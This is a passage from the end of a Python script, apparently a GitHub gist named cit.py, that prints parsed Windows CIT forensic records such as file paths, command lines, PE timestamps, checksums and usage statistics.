print_stats(cit.system_data.stats)
print()
for i, entry in enumerate(cit.entries):
print(f"Entry {i}:")
print(" File path:", entry.file_path)
print(" Command line:", entry.command_line)
print(" PE TimeDateStamp", datetime.fromtimestamp(entry.program_data.PeTimeDateStamp, tz=timezone.utc))
print(" PE CheckSum", hex(entry.program_data.PeCheckSum))
print(" Extra 3:", entry.program_data.Extra3)
print(" Bitmaps:")
print_bitmap("Foreground", entry.use_data.bitmaps.foreground)
print(" Span stats:")
print_span_stats(entry.use_data.span_stats)
print(" Stats:")
print_stats(entry.use_data.stats)
print()
if __name__ == "__main__":
main()
view raw cit.py hosted with ❤ by GitHub
❌